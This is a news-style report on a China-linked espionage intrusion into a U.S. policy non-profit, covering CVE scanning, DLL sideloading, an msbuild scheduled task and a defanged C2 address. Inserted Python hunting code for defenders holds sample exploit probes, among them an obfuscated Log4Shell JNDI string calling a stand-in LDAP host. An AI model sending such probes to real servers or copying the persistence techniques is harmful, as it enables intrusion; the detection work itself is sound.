Chinese Hackers Target Organization Influencing U.S. Government Policy on International Issues

China-linked threat actors have intensified their focus on influencing American governmental decision-making processes by targeting organizations involved in shaping international policy.

In April 2025, a sophisticated intrusion into a U.S. non-profit organization revealed the persistent efforts of these attackers to establish long-term network access and gather intelligence related to policy matters.

The threat actors demonstrated considerable technical sophistication, employing multiple evasion techniques and exploiting various vulnerabilities to maintain control over the compromised infrastructure for several weeks.

The attack campaign reflects a broader pattern of Chinese state-sponsored espionage targeting policy-influencing institutions.

Initial reconnaissance began on April 5, 2025, when attackers conducted mass vulnerability scans against organizational servers, attempting exploits including CVE-2022-26134 (Atlassian OGNL Injection), CVE-2021-44228 (Log4j), CVE-2017-9805 (Apache Struts), and CVE-2017-17562 (GoAhead RCE).

These scanning activities established the foundation for their subsequent exploitation attempts and network compromise.
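The scanning burst described above is the kind of activity a defender can pick out of web-server logs well before any exploitation succeeds. The following is an added example, not code from the article or from Symantec: it triages constructed request records (in the shape a reverse proxy that logs headers and a body prefix might emit) against coarse signatures for the four CVEs named above, and then groups hits by source address, because one source probing several unrelated CVEs in a short window is the mass-scan pattern rather than a targeted exploit. The record layout, field names and sample values are assumptions made for the example; the signatures are triage heuristics, not a replacement for a WAF or IDS ruleset.

```python
"""Triage web request records for probes matching CVE-2022-26134, CVE-2021-44228,
CVE-2017-9805 and CVE-2017-17562, then summarise per source address.
Added example; the records below are constructed for illustration."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit


def normalize_jndi(s):
    """Undo common Log4Shell lookup obfuscations (${lower:j}, ${::-j}) so the
    ${jndi: marker becomes visible; loops because wrappers can be nested."""
    prev = None
    while prev != s:
        prev = s
        s = re.sub(r"\$\{(?:lower|upper):([^{}])\}", r"\1", s, flags=re.I)
        s = re.sub(r"\$\{[^{}]*:-([^{}])\}", r"\1", s)
    return s


def detect(rec):
    """Return the set of CVE ids whose probe signature matches one request record."""
    hits = set()
    headers = rec.get("headers", {})
    body = rec.get("body", "")
    path = unquote(rec.get("path", ""))

    # CVE-2022-26134: Confluence OGNL injection, a ${...} expression as the URI path.
    if re.match(r"/\$\{.*\}", path):
        hits.add("CVE-2022-26134")

    # CVE-2021-44228: a JNDI lookup string anywhere the server might log it.
    fields = [path] + list(headers.values()) + [body]
    if any(re.search(r"\$\{\s*jndi:", normalize_jndi(unquote(f)), re.I) for f in fields):
        hits.add("CVE-2021-44228")

    # CVE-2017-9805: Struts2 REST plugin XStream deserialization; an XML body
    # that names ProcessBuilder is the widely published indicator.
    ctype = headers.get("Content-Type", "").lower()
    if rec.get("method") == "POST" and "xml" in ctype and "ProcessBuilder" in body:
        hits.add("CVE-2017-9805")

    # CVE-2017-17562: GoAhead CGI environment injection via an LD_PRELOAD query parameter.
    query = parse_qs(urlsplit(rec.get("path", "")).query, keep_blank_values=True)
    if "LD_PRELOAD" in query:
        hits.add("CVE-2017-17562")
    return hits


def scanning_sources(records, distinct_cves=2):
    """Map each source address to the sorted CVEs it probed, keeping only sources
    that touched at least `distinct_cves` different ones (the mass-scan shape)."""
    by_src = defaultdict(set)
    for rec in records:
        by_src[rec["src"]] |= detect(rec)
    return {src: sorted(c) for src, c in by_src.items() if len(c) >= distinct_cves}


# Constructed request records; 203.0.113.5 plays the scanner, 198.51.100.7 a normal user.
RECORDS = [
    {"src": "203.0.113.5", "method": "GET", "path": "/%24%7Bconstructed-ognl-probe%7D/",
     "headers": {"User-Agent": "python-requests/2.31"}},
    {"src": "203.0.113.5", "method": "GET", "path": "/login",
     "headers": {"User-Agent": "${${lower:j}ndi:ldap://203.0.113.5:1389/a}"}},
    {"src": "203.0.113.5", "method": "POST", "path": "/struts2-rest-showcase/orders/3",
     "headers": {"Content-Type": "application/xml"},
     "body": "<map><entry><java.lang.ProcessBuilder/></entry></map>"},
    {"src": "203.0.113.5", "method": "GET", "path": "/cgi-bin/index?LD_PRELOAD=constructed",
     "headers": {}},
    {"src": "198.51.100.7", "method": "GET", "path": "/index.html",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    # A ${...} token in a query parameter is not the OGNL-in-path shape and must not fire.
    {"src": "198.51.100.7", "method": "GET", "path": "/search?q=%24%7Bprice%7D",
     "headers": {"User-Agent": "Mozilla/5.0"}},
]

if __name__ == "__main__":
    for src, cves in scanning_sources(RECORDS).items():
        print(f"{src} probed {len(cves)} distinct CVEs: {', '.join(cves)}")
```

The per-source grouping is the part worth keeping even if the signatures are swapped for a vendor ruleset: a single address cycling through Confluence, Log4j, Struts and GoAhead checks within minutes is the opening move the article describes, and it is visible in access logs regardless of whether any of those products is actually deployed.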

Symantec security analysts identified multiple tactical indicators linking this campaign to established Chinese threat groups including Space Pirates, Kelp (Salt Typhoon), and Earth Longzhi, a recognized subgroup of the long-standing APT41 collective.

The forensic evidence pointed directly to China-based attribution through several distinctive attack methodologies.

DLL Sideloading as Primary Persistence Mechanism

The attackers deployed DLL sideloading as their primary persistence mechanism, leveraging a legitimate VipreAV component named vetysafe.exe to execute malicious payload sbamres.dll.

This technique abuses the Windows DLL search order: a malicious DLL placed where a legitimate, signed application looks first is loaded and executed under that application's identity, without modifying the application itself.

The attackers also created a scheduled task running every 60 minutes with SYSTEM privileges, executing msbuild.exe to load an unidentified XML file containing injected code.

This code subsequently established communication with a command-and-control server at hxxp://38.180.83[.]166/6CDF0FC26CDF0FC2.

This combination of techniques allowed the attackers to maintain persistent access while evading traditional signature-based detection, demonstrating evolving capabilities in targeting U.S. policy institutions.
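Both persistence behaviours described in this section, the sideloaded DLL and the SYSTEM-level scheduled task driving msbuild.exe, leave distinctive traces in standard Windows telemetry. The following is an added example, not code from the article or from Symantec: it runs two hunting rules over constructed stand-ins for Windows Security event 4698 (scheduled task created, which carries the task XML) and Sysmon event 7 (image loaded). Rule 1 flags tasks that launch msbuild.exe with a project or XML argument, noting when they run as SYSTEM on a short repeat interval; rule 2 flags an unsigned DLL loaded by an executable from that executable's own directory when the directory lies outside the trusted program paths, which is the shape of DLL sideloading. The event field names, file paths, task names and interval threshold are assumptions made for the example.

```python
"""Hunt msbuild.exe scheduled tasks and DLL sideloading in endpoint telemetry.
Added example; event records below are constructed for illustration."""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}
# DLL loads from under these directories are treated as expected; elsewhere gets scrutiny.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_iso_duration_minutes(value):
    """Parse the subset of ISO-8601 durations Task Scheduler emits (PT60M, PT1H, P1D)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value)
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def check_task(task_xml, max_interval_minutes=120):
    """Rule 1: return findings for each Exec action that runs msbuild.exe on a project file."""
    root = ET.fromstring(task_xml)
    user = root.findtext(".//t:Principal/t:UserId", default="", namespaces=TASK_NS).strip()
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=TASK_NS)
    minutes = parse_iso_duration_minutes(interval) if interval else None
    findings = []
    for exec_el in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = exec_el.findtext("t:Command", default="", namespaces=TASK_NS).strip().strip('"')
        args = exec_el.findtext("t:Arguments", default="", namespaces=TASK_NS)
        if PureWindowsPath(cmd).name.lower() != "msbuild.exe":
            continue
        if not re.search(r"\.(xml|proj|csproj|vbproj|targets)\b", args, re.I):
            continue
        reasons = ["msbuild.exe launched with a project file (inline-task execution vector)"]
        if user.upper() in SYSTEM_IDS:
            reasons.append("runs as SYSTEM")
        if minutes is not None and minutes <= max_interval_minutes:
            reasons.append(f"repeats every {minutes:g} minutes")
        findings.append({"command": cmd, "arguments": args, "reasons": reasons})
    return findings


def check_image_load(rec):
    """Rule 2: flag an unsigned DLL loaded from the loading process's own directory
    when that directory is outside the trusted program paths."""
    image, dll = PureWindowsPath(rec["Image"]), PureWindowsPath(rec["ImageLoaded"])
    if dll.suffix.lower() != ".dll":
        return None
    same_dir = str(image.parent).lower() == str(dll.parent).lower()
    in_trusted = (str(dll.parent).lower() + "\\").startswith(TRUSTED_DIRS)
    unsigned = str(rec.get("Signed", "false")).lower() != "true"
    if same_dir and not in_trusted and unsigned:
        return {"process": str(image), "dll": str(dll),
                "reason": "unsigned DLL loaded from the process's own directory outside trusted paths"}
    return None


def hunt(task_events, load_events):
    """Apply both rules and return a flat list of alerts."""
    alerts = []
    for ev in task_events:
        for f in check_task(ev["TaskContent"]):
            alerts.append({"rule": "suspicious-msbuild-task", "task": ev["TaskName"], **f})
    for rec in load_events:
        f = check_image_load(rec)
        if f:
            alerts.append({"rule": "possible-dll-sideload", **f})
    return alerts


# Constructed task XML mirroring the described behaviour: hourly, SYSTEM, msbuild.exe + XML.
SUSPICIOUS_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT60M</Interval></Repetition></TimeTrigger></Triggers>
  <Principals><Principal><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions><Exec><Command>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe</Command>
    <Arguments>C:\\ProgramData\\update\\build.xml</Arguments></Exec></Actions>
</Task>"""
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Repetition><Interval>P1D</Interval></Repetition></CalendarTrigger></Triggers>
  <Principals><Principal><UserId>CORP\\backupsvc</UserId></Principal></Principals>
  <Actions><Exec><Command>C:\\Windows\\System32\\cmd.exe</Command><Arguments>/c backup.bat</Arguments></Exec></Actions>
</Task>"""

TASK_EVENTS = [  # constructed stand-ins for Security event 4698
    {"TaskName": "\\Microsoft\\Windows\\UpdateCheck", "TaskContent": SUSPICIOUS_TASK_XML},
    {"TaskName": "\\Backup\\Nightly", "TaskContent": BENIGN_TASK_XML},
]
LOAD_EVENTS = [  # constructed stand-ins for Sysmon event 7; paths are assumptions
    {"Image": "C:\\ProgramData\\VipreStage\\vetysafe.exe",
     "ImageLoaded": "C:\\ProgramData\\VipreStage\\sbamres.dll", "Signed": "false"},
    {"Image": "C:\\Program Files\\VIPRE\\vetysafe.exe",
     "ImageLoaded": "C:\\Program Files\\VIPRE\\sbamres.dll", "Signed": "true"},
    {"Image": "C:\\ProgramData\\VipreStage\\vetysafe.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for alert in hunt(TASK_EVENTS, LOAD_EVENTS):
        print(alert)
```

Rule 2 deliberately keys on the loading directory and the DLL's signature rather than on the file names from this campaign, so the same signed vendor binary in its normal install location with its normal signed DLL stays quiet while a copy staged under a writable path with an unsigned companion DLL is surfaced; that is what makes the rule hold up when the next campaign picks a different host executable.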
